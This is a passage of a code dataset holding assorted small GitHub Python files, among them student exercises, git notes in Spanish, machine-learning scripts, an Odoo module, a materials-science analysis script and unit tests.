real_manifold_dict[classifier]\n if classifier not in results:\n results[classifier] = dict()\n fake_manifold_list = tqdm(fake_manifold_list_dict.get(classifier, []))\n for name, fake_manifold in fake_manifold_list:\n fake_manifold_list.set_description(f'Classifier={classifier}, Name={name}')\n results[classifier][name] = 
get_precision_and_recall(real_manifold, fake_manifold)\n \n save_path = os.path.abspath(opts.out_path)\n save_dir, _ = os.path.split(save_path)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n print(f'Writing results to {save_path}')\n with open(save_path, mode='w', encoding='utf8', newline='') as f:\n writer = csv.writer(f, delimiter=',')\n fake_names = sorted(fake_name_set)\n writer.writerow(['']*2 + [name for name in fake_names])\n for classifier in sorted(classifier_set):\n rows = [[classifier, 'precision'], [classifier, 'recall']]\n res_cls = results.get(classifier)\n if res_cls:\n for name in fake_names:\n v:PrecisionRecall = res_cls.get(name)\n rows[0].append(v.precision)\n rows[1].append(v.recall)\n \n writer.writerows(rows)\n \n if opts.json is not None:\n json_path = os.path.splitext(save_path)[0] + '.json' if not opts.json else opts.json\n print(f'Writing results to {json_path}')\n json_data = []\n for classifier in sorted(classifier_set):\n res_cls = results.get(classifier)\n if not res_cls:\n continue\n for name in fake_names:\n value = res_cls.get(name)\n if value is None:\n continue\n json_data.append({'classifier':classifier, 'name':name, 'precision': value.precision, 'recall': value.recall})\n with open(json_path, mode='w', encoding='utf8', newline='') as f:\n json.dump(json_data, f, indent=4)\n\n\nif __name__ == '__main__':\n main(parse_args())","repo_name":"toshiaki1729/image-assessing-toolbox","sub_path":"precision_recall.py","file_name":"precision_recall.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72745803667","text":"from math import sqrt\n\n\nprint(\"Clase 1\")\n\n'''\n Comentarios\n Los nombres de variables deben iniciar en minúscula, los de las clases en mayúscula.\n'''\n\n#Comentarios de GIT\n'''\n GIT INIT ---> Inicializa la Rama\n GIT ADD ---> Agrega los nuevos cambios\n GIT STATUS ---> Muestra el estatus de los commits\n GIT COMMIT ---> Toma la foto\n Regla de clase al darle mensaje al Commit ---> NTV1 (El número varía por la clase)\n GIT LOG ---> Muestra los commits.\n GIT REMOTE ADD origin https://github.com/usuario/repositorio.git ---> Añadir repositorio en remoto.\n GIT PUSH -U ORIGIN MASTER ---> La primera vez que vinculamos el repositorio remoto con el local.\n GIT PULL ---> Para descargar los cambios del repositorio remoto al local.\n GIT CLONE (URL) ---> Clonar repositorio al local.\n GIT COMMIT --AMEND -M \"\" ---> Renombrando commit\n GIT CONFIG --GLOBAL --UNSET CREDENTIAL.HELPER \n GIT CONFIG --UNSET CREDENTIAL.HELPER \n'''\n\nprint(\"Clase 2 NTV\")\n\n'''\n Convensiones ---> Estructurar adecuadamente los archivos.\n .gitignore ---> Archivo de configuración. 
Especificar las carpetas o archivos que no voy a versionar.\n'''\n\n#Entradas del problema.\n#En python siempre se le debe dar valor a una variable;\n#Para dejarla sin un valor agregamos la palabra none.\n'''\nnumero1 = None\nnumero2 = int(input(\"Digite el número 2: \"))\nnumero3 = int(input(\"Digite el número 3: \"))\n#numero3 = 80\nprint(f'El número 2 es {numero2}')\nprint(f'El número 3 es {numero3}')\nsuma = numero2 + numero3\nprint(f'La suma es {suma}')\n'''\n'''\nciudad = \"Medellín\"\nprint(f'Tu ciudad es {ciudad}')\nprint(numero1)\nprint(numero2)\nprint(numero3)\nprint(numero3 == numero1)\nnombre = input(\"Ingresa nombre: \")\nprint(f'Su nombre es {nombre}')\n'''\n\n#Retos\nprint(\"Clase 3 NTV\")\n\nprint(\"Retos\")\n\nnumero = 1\nsuma = 0\nwhile(numero >= 0):\n numero = int(input(\"Digite un número entero positivo; uno negativo para salir: \"))\n print(f'El número es {numero}')\n if numero >= 0: # do not add the negative sentinel to the total\n suma = suma + numero\n print(f'La suma es {suma}')\n\nprint(\"Has salido.\")\n\n\n#Menú\n\nnumero = 1\n\nwhile (numero != 0):\n print(\" 0 ---> Salida \\n 1 ---> Encuentre si el número es múltiplo de 2 \\n 2 ---> Encuentre la raiz cuadrada del número \\n 3 ---> Sume 100 al número ingresado \\n 4 ---> Eleve a la 2 el número ingresado.\")\n\n numero = int (input(\"Qué opción elegirás: \"))\n if(numero == 1):\n numeroMultiploDos = int(input(\"Ingrese el número a averiguar si es múltiplo de 2: \"))\n residuo = numeroMultiploDos % 2\n if(residuo == 0):\n print(\"Es múltiplo de 2.\")\n else:\n print(\"No es múltiplo de 2.\")\n\n if(numero == 2):\n numeroRaizCuadrada = int(input(\"Ingrese el número para saber su raiz cuadrada: \"))\n raizCuadrada = sqrt(numeroRaizCuadrada)\n print(f'La raiz cuadrada de {numeroRaizCuadrada} es {raizCuadrada}')\n\n if(numero == 3):\n numeroSumar = int(input(\"Ingrese el número al que desea sumarle 100: \"))\n numeroSumar = numeroSumar + 100\n print(f'El resultado es {numeroSumar}.')\n\n if(numero == 4):\n numeroElevar = int(input(\"Ingrese el número a elevar: \"))\n elevar = numeroElevar ** 2 # exponentiation: raise to the power of 2, not multiply by 2\n print(f'El número a elevar que ingresaste fue {numeroElevar} y el resultado es {elevar}')\n\n\n#Suma de 12 en 12\n\nfor i in range(0, 200, 12):\n print(i, end=\", \")\n\nprint(\"\\n\")\n#Pedir 20 números y contar cuántos fueron negativos y positivos.\nnumeroEntero = None\ncentinela = 0\ncontadorPositivos = 0\ncontadorNegativos = 0\n\nwhile(centinela < 20):\n numero = int(input(\"Ingrese un número: \"))\n if(numero > 0):\n contadorPositivos += 1\n else:\n contadorNegativos += 1\n \n centinela+=1\n\nprint(f'Números negativos ingresados {contadorNegativos}. 
Números positivos ingresados {contadorPositivos}')\n\n'''Clase 4'''\n\n'''\n# crear rama\ngit branch nombre-rama\n\n# cambiar de rama\ngit checkout nombre-rama\n\n# crear una rama y cambiarte a ella\ngit checkout -b rama\n\n# eliminar rama\ngit branch -d nombre-rama\n\n#eliminar rama (forzado)\ngit branch -D nombre-rama\n\n# listar todas las ramas del repositorio\ngit branch\n\n# lista ramas no fusionadas a la rama actual\ngit branch --no-merged\n\n# lista ramas fusionadas a la rama actual\ngit branch --merged\n\n# rebasar ramas\ngit checkout rama-secundaria\ngit rebase rama-principal\n\n# nos cambiamos a la rama principal que quedará de la fusión\ngit checkout rama-principal\n\n# ejecutamos el comando merge con la rama secundaria a fusionar\ngit merge rama-secundaria\n\ngit push origin --delete rama\n'''\n\n#Git\n'''\nGit reset --soft (ID del Commit) \n'''","repo_name":"CamiloXXI/NTV","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43518167432","text":"# 팰린드롬은 어느 방향으로 읽어도 항상 같은 방법으로 읽을 수 있는 단어이다. 예를 들어, civic, radar, rotor, madam은 팰린드롬이다.\r\n#\r\n# 상근이는 단어 k개 적혀있는 공책을 발견했다. 공책의 단어는 ICPC 문제가 저장되어 있는 서버에 접속할 수 있는 비밀번호에 대한 힌트이다. 비밀번호는 k개의 단어 중에서 두 단어를 합쳐야 되고, 팰린드롬이어야 한다. 예를 들어, 단어가 aaba, ba, ababa, bbaa, baaba일 때, ababa와 ba를 합치면 팰린드롬 abababa를 찾을 수 있다.\r\n#\r\n# 단어 k개 주어졌을 때, 팰린드롬을 찾는 프로그램을 작성하시오.\r\n\r\nfrom itertools import combinations\r\ndef palindrome(word):\r\n if word == word[::-1]:\r\n return True\r\n else:\r\n return False\r\n\r\nT = int(input())\r\nfor _ in range(T):\r\n k = int(input())\r\n palindrome_li = []\r\n li = []\r\n for _ in range(k):\r\n string = input()\r\n li.append(string)\r\n combine_list = combinations(li, 2)\r\n for a, b in combine_list:\r\n combine_string1 = a + b\r\n combine_string2 = b + a\r\n if palindrome(combine_string1):\r\n palindrome_li.append(combine_string1)\r\n if palindrome(combine_string2):\r\n palindrome_li.append(combine_string2)\r\n if palindrome_li == []:\r\n print(0)\r\n else:\r\n print(palindrome_li[0])","repo_name":"dnwls16071/PS_Baekjoon","sub_path":"8000~8999/8892.py","file_name":"8892.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35393245762","text":"import math\n\nx_frac = 0\nfrac_list = []\nx_list = []\ny_list = []\nlow = 2\nhi = 10\nN = 10\narea = 0\nx = low\n\ndef f(x):\n return 2*x\n\nfor i in range(N):\n x += (1/N)*(hi-low)\n x_list.append(x)\n\nprint(x_list)\n\nfor x in x_list:\n y_list.append(f(x))\n\nx_diff = x_list[1] - x_list[0]\n\nfor y in y_list:\n area += x_diff*y\n\nprint(area)\n\n\n\n\ndef dbl(x):\n \"\"\" input: a number x (int or float)\n output: twice the input\n \"\"\"\n return 2*x\n\ndef unitfracs(N):\n frac = 0\n frac_list = []\n for i in range(0,N):\n frac_list.append(frac)\n frac += 1/N\n\n return frac_list\n\n#print(unitfracs(4))\n\ndef scaledfracs(low,hi,N):\n scaled_list = []\n frac_list = unitfracs(N)\n for frac in frac_list:\n scaled_list.append(low+frac*(hi-low))\n return scaled_list\n\n#print(scaledfracs(10, 30, 5 ))\n\ndef sqfracs(low,hi,N):\n sqfracs_list = []\n scaled_list = scaledfracs(low,hi,N)\n for frac in scaled_list:\n sqfracs_list.append(frac**2)\n\n return sqfracs_list\n\n#print(sqfracs(4,10,6))\n\ndef f_of_fracs(f,low,hi,N):\n y_list = []\n scaled_list = scaledfracs(low,hi,N)\n for frac in scaled_list:\n y_list.append(f(frac))\n\n return 
y_list\n\n#print(f_of_fracs(math.sin, 0, math.pi, 4))\n\ndef integrate(f,low,hi,N):\n total = 0\n y_list = f_of_fracs(f,low,hi,N)\n x_list = scaledfracs(low,hi,N)\n x_diff = x_list[1]-x_list[0]\n for i in range(len(y_list)):\n total += y_list[i]*x_diff\n\n return total\n\n#print(integrate(math.sin, 0, math.pi, 1000))\n","repo_name":"beccaelenzil-teach/CS-Becca-1718","sub_path":"fundamentals_of_cs/p3_integrate.py","file_name":"p3_integrate.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6673460702","text":"import matplotlib.pyplot as plt\nimport platform\n\nfrom datetime import datetime\n\n# matplotlib 패키지 한글 깨짐 처리 시작\nif platform.system() == 'Darwin': # mac os\n plt.rc('font', family='AppleGothic')\nelif platform.system() == 'Windows': # 윈도우\n plt.rc('font', family='Malgun Gothic')\nelif platform.system() == 'Linux': # 리눅스 (구글 콜랩)\n #!wget \"https://www.wfonts.com/download/data/2016/06/13/malgun-gothic/malgun.ttf\"\n #!mv malgun.ttf /usr/share/fonts/truetype/\n #import matplotlib.font_manager as fm\n #fm._rebuild()\n plt.rc('font', family='Malgun Gothic')\n\nplt.rcParams['axes.unicode_minus'] = False # 한글 폰트 사용시 마이너스 폰트 깨짐 해결\n# matplotlib 패키지 한글 깨짐 처리 끝\n\n# 통계 시작\ndef statistics_pie_char(time: datetime.today(), user_name: str):\n # pie chart를 사용할 때, 원의 형태를 유지하기 위한 명령어\n plt.axis('equal')\n\n # 추후에 text 감정분석 파트가 개발 완료가 되면 검출된 감정들을 list로 받고 (중요: 중복 허용해야함)\n # sizes는 각 감정의 개수만큼으로 비율화\n # 위 두 사항을 적용해서 static이 아닌 변화형 pie chart 출력하도록 수정\n labels = ['우울', '두려움', '행복', '중립']\n sizes = [15, 30, 45, 10]\n colors = ['yellowgreen', 'gold', 'lightskyblue', 'lightcoral']\n explode = (0, 0.1, 0, 0)\n plt.title(f\"{time} {user_name} 심리분석 결과\")\n plt.pie(sizes, explode=explode, labels=labels, colors=colors,\n autopct='%1.1f%%', shadow=True, startangle=90)\n plt.axis('equal')\n\n # 그래프 출력\n # plt.show()\n # 그래프 저장\n plt.savefig(f'/Users/sharekim_hangyuseong/Desktop/{time} {user_name}.jpg')\n\n\nif __name__ == '__main__':\n time = datetime.today().strftime(\"%Y-%m-%d\")\n\n statistics_pie_char(time, user_name='user_name')","repo_name":"KYUSEONGHAN/Drawing-Dirary","sub_path":"statistics/daily_text.py","file_name":"daily_text.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10154915333","text":"# -*- coding: utf-8 -*-\n# © <2016> \n# © <2019> \n# © <2019> \n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom odoo import api, fields, models\n\n\nclass CountryCity(models.Model):\n _name = 'res.country.city'\n _description = \"City model\"\n\n country_id = fields.Many2one(\n 'res.country',\n 'Country',\n required=True\n )\n state_id = fields.Many2one(\n 'res.country.state',\n 'State',\n domain=\"[('country_id','=',country_id)]\",\n required=True\n )\n name = fields.Char('Name', size=64, required=True)\n code = fields.Char('Code', size=4, required=True)\n\n\nclass CountryZone(models.Model):\n _name = 'res.country.zone'\n _description = \"Zone model\"\n\n country_id = fields.Many2one(\n 'res.country',\n 'Country',\n required=True\n )\n state_id = fields.Many2one(\n 'res.country.state',\n 'State',\n domain=\"[('country_id','=',country_id)]\",\n required=True\n )\n city_id = fields.Many2one(\n 'res.country.city',\n 'Canton',\n domain=\"[('state_id','=',state_id)]\",\n required=True\n )\n name = fields.Char('Name', size=64, required=True)\n code = fields.Char('Code', size=6, 
required=True)","repo_name":"gromanec/odoo-ecuador","sub_path":"l10n_ec_ote/models/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"28192255723","text":"import pandas as pd\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport time\nimport copy\nfrom res_bol_mac import res_bol_mac\n\n\n\nclass SDNE:\n def __init__(self,args,path):\n self.suffix = path.split('.')[-1]\n self.is_variables_init = False\n self.args = args\n self.path = path\n config = tf.ConfigProto()\n self.sess = tf.Session(config=config)\n \n \n self.layers = len(args['struct'])\n self.struct = args['struct']\n self.sparse_dot = False\n self.W = {}\n self.b = {}\n struct = self.struct\n for i in range(self.layers - 1):\n name = \"encoder\" + str(i)\n self.W[name] = tf.Variable(tf.random.normal([struct[i], struct[i+1]]), name = name)\n self.b[name] = tf.Variable(tf.zeros([struct[i+1]]), name = name)\n struct.reverse()\n for i in range(self.layers - 1):\n name = \"decoder\" + str(i)\n self.W[name] = tf.Variable(tf.random.normal([struct[i], struct[i+1]]), name = name)\n self.b[name] = tf.Variable(tf.zeros([struct[i+1]]), name = name)\n self.struct.reverse()\n\n \n self.Adjacency_matrix = tf.placeholder(\"float\", [None,None])\n self.struct = struct\n tf.compat.v1.global_variables_initializer()\n self.X = tf.placeholder(\"float\",[None,struct[0]])\n self.X2 = tf.placeholder(\"float\",[None,struct[0]])\n tf.compat.v1.global_variables_initializer()\n\n self.Encode_Decode_process()\n self.loss = self.__make_loss(args)\n self.optimizer = tf.compat.v1.train.RMSPropOptimizer(args['learning_rate']).minimize(self.loss)\n self.optimizer1 = tf.compat.v1.train.AdamOptimizer(args['learning_rate']).minimize(self.loss)\n\n def Encode_Decode_process(self):\n def Encoder(X):\n for i in range(self.layers-1):\n name = \"encoder\" + str(i)\n X = tf.nn.sigmoid(tf.matmul(X,self.W[name])+self.b[name])\n return X\n def Decoder(X):\n for i in range(self.layers-1):\n name = \"decoder\"+ str(i)\n X = tf.nn.sigmoid(tf.matmul(X,self.W[name])+self.b[name])\n return X\n\n\n \n \n\n self.H = Encoder(self.X)\n self.X_reconstruct = Decoder(self.H)\n\n\n def __make_loss(self,args):\n def get1loss(Enc,adj_matrix):\n D = tf.linalg.tensor_diag(tf.reduce_sum(adj_matrix,1))\n L = D - adj_matrix\n return 2*tf.trace(tf.matmul(tf.matmul(tf.transpose(Enc),L),Enc)) \n def get2loss(X,Dec,beta):\n B = X * (beta-1) + 1\n return tf.reduce_sum(tf.pow((Dec - X)* B, 2))\n def get_reg_loss(w,b):\n ret = tf.add_n([tf.nn.l2_loss(wi) for wi in w.values()])\n ret = ret + tf.add_n([tf.nn.l2_loss(bi) for bi in b.values()])\n return ret\n\n\n self.loss_1 = get1loss(self.H,self.Adjacency_matrix)\n self.loss_2 = get2loss(self.X,self.X_reconstruct,self.args['beta'])\n self.loss_reg = get_reg_loss(self.W,self.b)\n return args['gamma']*self.loss_1 + args['alpha']*self.loss_2 + args['reg']*self.loss_reg\n\n \n def do_variables_init(self,data):\n def assign(a,b):\n op = a.assign(b)\n self.sess.run(op)\n init = tf.compat.v1.global_variables_initializer()\n print(\"ABBBB\")\n print(data)\n self.sess.run(init)\n if self.args['dbn_init']:\n shape = self.struct\n myRBMs = []\n for i in range(len(shape)-1):\n myRBM = res_bol_mac([shape[i],shape[i+1]],{\"batch_size\":self.args['dbn_batch_size'],\"learning_rate\":self.args['dbn_learning_rate']},self)\n myRBMs.append(myRBM)\n for epoch in range(self.args['dbn_epochs']):\n error = 0\n for batch in 
range(0,self.struct[0],self.args['dbn_batch_size']):\n mini_batch = data.sample(self.args['dbn_batch_size']).X\n for k in range(len(myRBMs)-1):\n mini_batch = myRBMs[k].getH(mini_batch)\n error += myRBM.fit(mini_batch)\n print(\"rbm epochs:\",epoch,\"error:\",error)\n W,bv,bh = myRBM.getWb()\n name = \"encoder\" + str(i)\n assign(self.W[name],W)\n assign(self.b[name],bh)\n name =\"decoder\" + str(self.layers - i -2)\n assign(self.W[name],W.transpose())\n assign(self.b[name],bv)\n self.is_Init = True\n \n def save_model(self,path):\n saver = tf.train.Saver(list(self.b.values()) + list(self.W.values()))\n saver.save(self.sess,path)\n\n def get_feed_dict(self,data):\n X = data.X\n return {self.X:data.X,self.Adjacency_matrix:data.adjacency_matriX}\n def __get_feed_dict(self,Encoded,adj):\n return {self.H:Encoded,self.Adjacency_matrix:adj}\n \n def get_loss(self, data):\n feed_dict = self.get_feed_dict(data)\n return self.sess.run(self.loss, feed_dict = feed_dict)\n \n\n def get_embedding(self,data):\n print(self.H,self.X)\n return self.sess.run(self.H,feed_dict= self.get_feed_dict(data))\n def fit(self,data):\n feed_dict = self.get_feed_dict(data)\n ret,_ = self.sess.run((self.loss,self.optimizer),feed_dict=feed_dict)\n return ret\n ","repo_name":"vikas784/GraphNetworks","sub_path":"SDNE.py","file_name":"SDNE.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12477127694","text":"from tensorflow.keras.models import load_model\nimport cv2\nimport os\nimport numpy as np\nimport pandas as pd \nimport glob2\nfrom tqdm import tqdm\n\nMODEL_SURPRISE = load_model('EfficientNetB4_image_regression_surprise.h5')\nMODEL_SAD = load_model('EfficientNetB4_image_regression_sad.h5')\nMODEL_OTHER = load_model('EfficientNetB4_image_regression_other.h5')\nMODEL_NEUTRAL = load_model('EfficientNetB4_image_regression_neutral.h5')\nMODEL_HAPPY = load_model('EfficientNetB4_image_regression_happy.h5')\nMODEL_FEAR = load_model('EfficientNetB4_image_regression_fear.h5')\nMODEL_DISGUST = load_model('EfficientNetB4_image_regression_disgust.h5')\nMODEL_ANGRY = load_model('EfficientNetB4_image_regression_angry.h5')\n\ndef get_output_image_regression(image_id, image, input_size=380):\n image = cv2.resize(image, (input_size, input_size))\n image = image / 255.0\n image = image.reshape((1,input_size,input_size,3))\n\n prob_surprise = MODEL_SURPRISE.predict(image)[0][0] \n prob_sad = MODEL_SAD.predict(image)[0][0] \n prob_other = MODEL_OTHER.predict(image)[0][0]\n prob_neutral = MODEL_NEUTRAL.predict(image)[0][0] \n prob_happy = MODEL_HAPPY.predict(image)[0][0]\n prob_fear = MODEL_FEAR.predict(image)[0][0] \n prob_disgust = MODEL_DISGUST.predict(image)[0][0] \n prob_angry = MODEL_ANGRY.predict(image)[0][0]\n\n result_dict = {\n 'image_id': image_id,\n 'angry': prob_angry,\n 'disgust': prob_disgust,\n 'fear': prob_fear,\n 'happy': prob_happy,\n 'sad': prob_sad,\n 'surprise': prob_surprise,\n 'neutral': prob_neutral,\n 'other': prob_other\n }\n\n result_list = [image_id, prob_angry, prob_disgust, prob_fear, prob_happy, prob_sad, prob_surprise, prob_neutral, prob_other]\n\n return result_dict, result_list\n\ndef get_submit_image_regression(folder_dir):\n list_image_name = glob2.glob(os.path.join(folder_dir, '*.jpg'))\n len_list_image_name = len(list_image_name)\n list_output = []\n with tqdm(total=len_list_image_name) as pbar:\n for image_path in list_image_name:\n image = cv2.imread(image_path)\n image_id = 
(image_path.split(\"/\")[-1]).split(\".\")[0]\n\n # get result\n result_dict, result_list = get_output_image_regression(image_id, image)\n list_output.append(result_list)\n pbar.update(1)\n \n df_output = pd.DataFrame(list_output)\n df_output.to_csv(\"output.csv\")\n print(\"########## DONE #############\")\n\nif __name__ == '__main__':\n get_submit_image_regression('test')","repo_name":"hieu28022000/Comic_emotions","sub_path":"src/Emotion_Regression/predict_regression.py","file_name":"predict_regression.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24148749947","text":"from setuptools import setup\n\nAPP = ['game/Perlin.py']\nDATA_FILES = [('', ['game', 'game/resources'])]\nOPTIONS = {'iconfile':'game/resources/icon/icon.png',}\n\nsetup(\n app=APP,\n data_files=DATA_FILES,\n options={'py2app': OPTIONS},\n setup_requires=['py2app'],\n)\n","repo_name":"JordanFist/perlin","sub_path":"pythonToApp/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12210715412","text":"from pathlib import Path\nfrom pprint import pprint\nimport json\nfrom ase.io import read, write\nfrom ase.geometry import crystal_structure_from_cell\nimport numpy as np\n# import numpy.linalg as la\n\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\n\n\nclass Calculation(object):\n def __init__(self, *args, **kwargs):\n self.filepath = kwargs.pop('filepath', None)\n self.parameters = kwargs\n\n def get_data(self, index=-1):\n return read(str(self.filepath))\n\n @classmethod\n def from_path(cls, path: Path):\n with (path / 'gb.json').open() as data_file:\n gb_data = json.load(data_file)\n\n with (path / 'subgb.json').open() as data_file:\n subgb_data = json.load(data_file)\n\n # print(gb_data['angle'])\n\n filename = subgb_data['name'] + \"_traj.xyz\"\n filepath = (path / filename).resolve()\n # configuration = read(str((path / filename).resolve()), index=index)\n # # gb = read(str((path / filename).resolve()), index=-1)\n\n\n # print('{:=^60}'.format(' '+str(path)+' '))\n #\n # print('{:-^40}'.format(' gb.json '))\n # pprint(gb_data)\n #\n # print('{:-^40}'.format(' subgb.json '))\n # pprint(subgb_data)\n\n # print('{:-^40}'.format(' initial '))\n #\n # force_norm = np.linalg.norm(gb_initial.arrays['force'], axis=1)\n # force_mean = np.mean(force_norm)\n # force_std = np.std(force_norm)\n #\n # print('Force mean: {:f}, std: {:f}'.format(force_mean, force_std))\n # pprint(gb_initial.calc.results)\n #\n # print('{:-^40}'.format(' final '))\n #\n # force_norm = np.linalg.norm(gb_final.arrays['force'], axis=1)\n # force_mean = np.mean(force_norm)\n # force_std = np.std(force_norm)\n #\n # print('Force mean: {:f}, std: {:f}'.format(force_mean, force_std))\n # pprint(gb_final.calc.results)\n\n\n return cls(**{**gb_data, **subgb_data}, filepath=filepath)\n\n\nif __name__ == '__main__':\n\n # Read grain boundary database\n dirpath = Path('../GB_alphaFe_001')\n\n calculations = {\n 'tilt': [Calculation.from_path(calc_dir) for calc_dir in (dirpath / 'tilt').iterdir() if calc_dir.is_dir()],\n 'twist': [Calculation.from_path(calc_dir) for calc_dir in (dirpath / 'twist').iterdir() if calc_dir.is_dir()]\n }\n\n # potential energy of the perfect crystal according to a specific potential\n potential_energy_per_atom = -4.01298214176 # alpha-Fe PotBH\n eV = 1.6021766208e-19\n 
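# unit constants used below to convert the GB energy from eV/Angstrom^2 to J/m^2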
Angstrom = 1.e-10\n\n angles, energies = [], []\n for calc in sorted(calculations['tilt'], key=lambda item: item.parameters['angle']):\n\n # E_gb = calc.parameters.get('E_gb', None)\n #\n # if E_gb is None:\n # print(calc.filepath)\n # print(calc.parameters['converged'])\n # else:\n\n # energy = 16.02 / (2 * calc.parameters['A'] ) * \\\n # (E_gb - potential_energy_per_atom * calc.parameters['n_at'])\n\n if calc.parameters.get('converged', None):\n # energy = 16.02 / (2 * calc.parameters['A'] ) * \\\n # (calc.parameters.get('E_gb') - potential_energy_per_atom * calc.parameters['n_at'])\n #\n atoms = calc.get_data()\n cell = atoms.get_cell()\n A = cell[0, 0] * cell[1, 1]\n\n energy = (\n eV / Angstrom**2 /\n (2 * A) *\n (atoms.get_potential_energy() - potential_energy_per_atom * len(atoms))\n )\n\n write(calc.filepath.name, atoms)\n\n\n # print(energy)\n # print(calc.parameters['converged'])\n # print(data.get_potential_energy()) # data.get_total_energy() == data.get_potential_energy()\n # energies.append(calc.parameters['E_gb'] - data.get_total_energy())\n energies.append(energy)\n angles.append(calc.parameters['angle'] * 180.0 / np.pi)\n else:\n print(\"not converged: \", calc.filepath)\n\n\n plt.bar(angles, energies)\n\n # x_smooth = np.linspace(min(angles), max(angles), 1000, endpoint=True)\n # f = interp1d(angles, energies, kind='cubic')\n # plt.plot(x_smooth, f(x_smooth), '-')\n\n plt.show()\n\n\n","repo_name":"kcl-tscm/quip-tutorial-2018-notebooks","sub_path":"scripts/Preprocess.py","file_name":"Preprocess.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"25741864782","text":"# given two variables swap their values by\n# not using a third variable (mathematical solution)\n# using a third variable (swap)\n# using a built in function (swap)\n\ndef maths(a, b):\n a = a+b\n b = a-b\n a = a-b\n return a, b\n\n\ndef swap(a, b):\n temp = a\n a = b\n b = temp\n return a, b\n\n\ndef built_in(a, b):\n a, b = b, a\n return a, b\n\n\na = int(input(\"Enter a number: \"))\nb = int(input(\"Enter another number: \"))\nprint(\"Numbers are : \", a, b)\nprint(\"Swapping using method one\")\nprint(\"Numbers are - \", maths(a, b))\nprint(\"Swapping using method two\")\nprint(\"Numbers are - \", swap(a, b))\nprint(\"Swapping using method three\")\nprint(\"Numbers are - \", built_in(a, b))\n","repo_name":"sammybarman/100-Days-of-Python","sub_path":"Day1/1-4.py","file_name":"1-4.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7271552674","text":"#!/usr/bin/python3\t\n\n\nimport asyncio\nfrom urllib.parse import urlsplit\n\n# CouchDB endpoint to probe on each incoming connection\nCOUCHDB_URL = urlsplit('http://127.0.0.1:5984/')\n\nasync def handle_echo(reader, writer): \n\n\t# check that CouchDB is reachable; the HTTP request must be sent as bytes\n\tcouchdb_reader, couchdb_writer = await asyncio.open_connection(\n\t\tCOUCHDB_URL.hostname, \n\t\tCOUCHDB_URL.port \n\t) \n\tcouchdb_writer.write( \n\t\t( \n\t\t\tf\"HEAD {COUCHDB_URL.path or '/'} HTTP/1.0\\r\\n\"\n\t\t\tf\"Host: {COUCHDB_URL.hostname}\\r\\n\"\n\t\t\tf\"\\r\\n\" \n\t\t).encode()\n\t)\n\tawait couchdb_writer.drain()\n\tcouchdb_writer.close()\n\n\t# echo the client's message back\n\tdata = await reader.read(100)\n\tmessage = data.decode()\n\taddr = writer.get_extra_info('peername')\n\n\tprint(f\"Received {message!r} from {addr!r}\")\n\n\tprint(f\"Send: {message!r}\")\n\twriter.write(data)\n\tawait writer.drain()\n\n\tprint(\"Close the connection\")\n\twriter.close()\n\n\n\n\nasync def 
main():\n\tserver = await asyncio.start_server(\n\t\thandle_echo, \n\t\t'127.0.0.1', \n\t\t8888 \n\t)\n\n\tprint(f'Serving on {server.sockets[0].getsockname()}')\n\n\tasync with server:\n\t\tawait server.serve_forever()\n\n\n\nasyncio.run(main())\n\n\n\n\n","repo_name":"JGarderon/nsl","sub_path":"tester-enregappel.py","file_name":"tester-enregappel.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29734397612","text":"import unittest\nfrom graph import Graph\nfrom node import Node\n\nclass TestGraph(unittest.TestCase):\n\n def test_empty(self):\n self.g = Graph()\n self.assertEqual(self.g._number_of_nodes(), 0)\n\n def test_add(self):\n self.g = Graph()\n n = Node('test1')\n self.g.add_node(n)\n self.assertEqual(self.g._number_of_nodes(), 1)\n\n def test_number_of_nodes(self):\n self.g = Graph()\n n = Node('test1')\n self.g.add_node(n)\n n = Node('test2')\n self.g.add_node(n)\n n = Node('test3')\n self.g.add_node(n)\n self.assertEqual(self.g._number_of_nodes(), 3)\n\n def test_nodes_fn(self):\n self.g = Graph()\n names = ['test1', 'test2', 'test3']\n nodes = set()\n for name in names:\n no = Node(name)\n self.g.add_node(no)\n nodes.add(no)\n self.assertTrue(nodes == set(self.g.nodes().keys()))\n\n def test_node_by_name(self):\n self.g = Graph()\n n = Node('test1')\n self.g.add_node(n)\n n = Node('test2')\n self.g.add_node(n)\n n = Node('test3')\n self.g.add_node(n)\n n = self.g._node_by_name('test2')\n self.assertEqual(n.name, 'test2')\n\n def test_node_edges_have_edges(self):\n self.g = Graph()\n a = Node('A')\n edge_nodes = ['B', 'C', 'D']\n s = set()\n for edge_node in edge_nodes:\n s.add(edge_node)\n n = Node(edge_node)\n a.add_edge(n)\n\n self.assertTrue(s == set([e.name for e in a.edges()]))\n\n def test_remove_node(self):\n self.g = Graph()\n name = 